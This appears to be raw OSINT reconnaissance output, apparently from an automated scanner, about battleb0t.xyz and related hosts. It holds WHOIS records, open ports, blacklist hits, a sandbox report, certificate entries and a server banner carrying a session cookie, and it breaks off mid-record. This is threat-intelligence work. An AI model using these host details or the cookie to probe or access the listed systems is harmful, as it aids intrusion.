Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Billing ID: REDACTED FOR PRIVACY
Billing Name: REDACTED FOR PRIVACY
Billing Organization: REDACTED FOR PRIVACY
Billing Street: REDACTED FOR PRIVACY
Billing City: REDACTED FOR PRIVACY
Billing State/Province: REDACTED FOR PRIVACY
Billing Postal Code: REDACTED FOR PRIVACY
Billing Country: REDACTED FOR PRIVACY
Billing Phone: REDACTED FOR PRIVACY
Billing Fax: REDACTED FOR PRIVACY
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: wesley.ns.cloudflare.com
Name Server: rachel.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN RDDS Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:09:16.270Z <<<
For more information on domain status codes, please visit https://icann.org/epp
The WHOIS information provided in this page has been redacted
in compliance with ICANN's Temporary Specification for gTLD
Registration Data.
The data in this record is provided by Uniregistry for informational
purposes only, and it does not guarantee its accuracy. Uniregistry is
authoritative for whois information in top-level domains it operates
under contract with the Internet Corporation for Assigned Names and
Numbers. Whois information from other top-level domains is provided by
a third-party under license to Uniregistry.
This service is intended only for query-based access. By using this
service, you agree that you will use any data presented only for lawful
purposes and that, under no circumstances will you use (a) data
acquired for the purpose of allowing, enabling, or otherwise supporting
the transmission by e-mail, telephone, facsimile or other
communications mechanism of mass unsolicited, commercial advertising
or solicitations to entities other than your existing customers; or
(b) this service to enable high volume, automated, electronic processes
that send queries or data to the systems of any Registrar or any
Registry except as reasonably necessary to register domain names or
modify existing domain name registrations.
Uniregistry reserves the right to modify these terms at any time. By
submitting this query, you agree to abide by this policy. All rights
reserved.
Domain name: nom-nom.link
Registry Domain ID: DO_219392db582b99394c2ad318b07284eb-UR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-09-09T13:47:20.59Z
Registrar Registration Expiration Date: 2023-09-09T13:47:20.59Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Name Server: rachel.ns.cloudflare.com
Name Server: wesley.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T15:09:16.51Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | nom-nom.link |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.200): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | reflektions (Net ID: 00:01:38:8D:E0:8C) | 37.7642, -122.3993 |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | 001viet.com |
| 2023-05-12 03:23:09 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.0:2053 | 188.114.96.0/24 |
| 2023-05-12 02:54:21 | HTTP Headers | No | Web Spider | 2 | 0 | 5 | 0 | None | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:21 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-1f4d\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:21 GMT", "cf-ray": "7c5f60688e300ce1-EWR", "content-type": "text/css", "x-frame-options": "DENY"} | http://vscode.battleb0t.xyz/cdn-cgi/styles/main.css |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2015-10-20T06:46:53Z
Creation Date: 2009-02-17T22:08:05Z
Registry Expiry Date: 2024-02-17T22:08:05Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.CLOUDFLARE.NET
Name Server: NS2.CLOUDFLARE.NET
Name Server: NS3.CLOUDFLARE.NET
Name Server: NS4.CLOUDFLARE.NET
Name Server: NS5.CLOUDFLARE.NET
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 90F710A107DA51ED78125D30A68704CF3C0308AFD01BFCD7057D4BD03B62C68B
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2022-03-16T19:39:08Z
Creation Date: 2009-02-17T22:08:05Z
Registrar Registration Expiration Date: 2024-02-17T22:08:05Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Name Server: ns1.cloudflare.net
Name Server: ns2.cloudflare.net
Name Server: ns3.cloudflare.net
Name Server: ns4.cloudflare.net
Name Server: ns5.cloudflare.net
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | +14806242505 |
| 2023-05-12 02:54:21 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.teamtailor.com/?utm_content=email-logo&%3Butm_source=can_recommend&%3Butm_medium=email&%3Butm_campaign=poweredby', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_8ac_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_8ac_ConnHashTable<2220>_HashTable_Mutex"\n "IsoScope_8ac_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "IsoScope_8ac_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_8ac_IE_EarlyTabStart_0x9a4_Mutex"\n "IsoScope_8ac_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2220"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.83.23.240:443"\n "34.102.226.70:443"\n "185.199.109.153:443"\n "172.217.12.104:443"\n "104.18.40.148:443"\n "142.250.189.174:443"\n "142.251.2.156:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cookie-cdn.cookiepro.com"\n "site.teamtailor-cdn.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"b,"vert.pix");break;case "PERCENT":Fy(d.verticalThresholds,b,"vert.pct")}Ev("sdl","init",!1)?Ev("sdl","pending",!1)||J(function(){return Gy()}):(Cv("sdl","init",!0),Cv("sdl","pending",!0),J(function(){Gy();if(Hy()){var e=Iy();qc(z,"scroll",e);qc(z,"resize",e)}else Cv("sdl","init",!1)}));return b}My.M="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),Ny=["www.youtube.com","www.youtube-nocookie.com"],Oy,Py=!1;" (Indicator: "youtube")\n "l=!!a.get("fixMissingApi");if(!(d||e||f||g.length||h.length))return;var n={Gf:d,Ef:e,Ff:f,lg:g,mg:h,gd:l,Xa:b},p=z.YT,q=function(){Vy(n)};if(p)return p.ready&&p.ready(q),b;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};J(function(){for(var t=H.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(Yy(w,"iframe_api")||Yy(w,"player_api"))return b}for(var x=H.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!Py&&Wy(x[A],n.gd))return mc("https://www.youtube.com/iframe_api")," (Indicator: "youtube")\n "Py=!0,b});return b}Zy.M="internal.enableAutoEventOnYouTubeActivity";var $y;function az(a){var b=!1;return b}az.M="internal.evaluateMatchingRules";" (Indicator: "youtube")\n "transportUrl:b,context:c},R(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Hh.ia+"&cx=c";hs()&&(f+="&sign="+Hh.se);var g=Qh||Zh?gs(b,f):void 0;g||(g=So("https://","http://",Hh.Gd+f));Cl().destination[a]={state:1,context:c};mc(g)}};function is(){if(xl()){return!0}return!1};var ls=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),ms={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},ns={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")\n "var Yv=function(a,b,c){function d(){var g=a();f+=e?(Ua()-e)*g.playbackRate/1E3:0;e=Ua()}var e=0,f=0;return{createEvent:function(g,h,l){var n=a(),p=n.Lf,q=void 0!==l?Math.round(l):void 0!==h?Math.round(n.Lf*h):Math.round(n.Uh),r=void 0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100),t=H.hidden?!1:.5<=Hk(c);d();var u=void 0;void 0!==b&&(u=[b]);var v=Av(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "gb_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "logo-white-boozt-08d85fbec897e7d82f0a6036c9faf79f_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "logo-white-arcticshores-e99943515962c301c3dabac179c35bbc_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "PONSSE-Mono_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "YUJTL01Z.txt" has type "ASCII text with very long lines"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YUJTL01Z.txt]- [targetUID: 00000000-00003556]\n "otPcCenter_1_.json" has type "JSON data"- [targetUID: N/A]\n "BHE6KHYQ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BHE6KHYQ.txt]- [targetUID: 00000000-00003556]\n "thumbnail-tailify_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPCM) density 56x56 segment length 16 Exif Standard: [TIFF image data little-endian direntries=8 description=Screenshot orientation=upper-left xresolution=122 yresolution=130 resolutionunit=3 software=GIMP 2.10.32 datetime=2023:03:03 15:41:04] comment: "Screenshot" progressive precision 8 800x447 components 3"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "otBannerSdk_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "RecoveryStore._257433F5-CA39-11ED-BBDD-0800270C1BB7_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "EH4F6MUO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EH4F6MUO.txt]- [targetUID: 00000000-00002220]\n "SD5F50OT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SD5F50OT.txt]- [targetUID: 00000000-00002220]\n "VOMTWSHD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\VOMTWSHD.txt]- [targetUID: 00000000-00003556]\n "U7ASHGL6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\U7ASHGL6.txt]- [targetUID: 00000000-00003556]\n "EM4GSH39.txt" has type "ASCII text with very long lines"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EM4GSH39.txt]- [targetUID: 00000000-00003556]\n "_257433F7-CA39-11ED-BBDD-0800270C1BB7_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFC8E8017BFE37FFB6.TMP" has type "data"- Location: [%TEMP%\\~DFC8E8017BFE37FFB6.TMP]- [targetUID: 00000000-00002220]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://tailwindcss.com"\n Pattern match: "https://+c"\n Pattern match: "https://cct.google/taggy/agent.js"\n Pattern match: "https://github.com/zloirock/core-js/blob/v3.29.0/LICENSE,source:https://github.com/zloirock/core-js"\n Pattern match: "http://fb.me/use-check-prop-types"\n Pattern match: "https://github.com/jonsuh/hamburgers"\n Pattern match: "https://jonsuh.com/hamburgers"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://www.teamtailor.com/en//"\n Pattern match: "https://www.googletagmanager.com/gtm.js?id=\'+i+dl+\'\';f.parentNode.insertBefore(j,f)"\n Pattern match: "MUID3B8AEA96FB9767392F82F848FADB66E8msn.com/10252761920003110112568170117331022662*"\n Pattern match: "google-analytics.com/g/collect},pA=function(){var"\n Pattern match: "www.youtube.com,www.youtube-nocookie.com],Oy,Py=!1"\n Heuristic match: "cookie-cdn.cookiepro.com"\n Pattern match: "https://+g,l=http://+g,n=1,p=H.getElementsByTagName(script),q=0;q"\n Pattern match: "https://td.doubleclick.net:https://googleads.g.doubleclick.net};var"\n Pattern match: "www.teamtailor.co | 185.199.109.153 |
| 2023-05-12 03:31:58 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.0:8080 | 188.114.97.0/24 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset="utf-8"
Date: <REDACTED>
Cache-Control: no-cache, no-store, must-revalidate, private
Pragma: no-cache
Set-Cookie: whostmgrrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086
Set-Cookie: whostmgrsession=%3a6IuBt4aiK1K5mEWt%2ce37772b57ce45a47eb222a7bbd7feb28; HttpOnly; path=/; port=2086
Set-Cookie: roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086
Set-Cookie: roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2086
Set-Cookie: PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086
Set-Cookie: imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086
Cache-Control: no-cache, no-store, must-revalidate, private
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Content-Length: 12420
| 87.248.157.102 |
| 2023-05-12 02:51:07 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 2 | 0 | None | VirusTotal [172.67.135.9]
https://www.virustotal.com/en/ip-address/172.67.135.9/information/ | 172.67.135.9 |
| 2023-05-12 03:08:47 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.225 | 104.196.30.220 |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.215): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:31 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | tiktok.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's 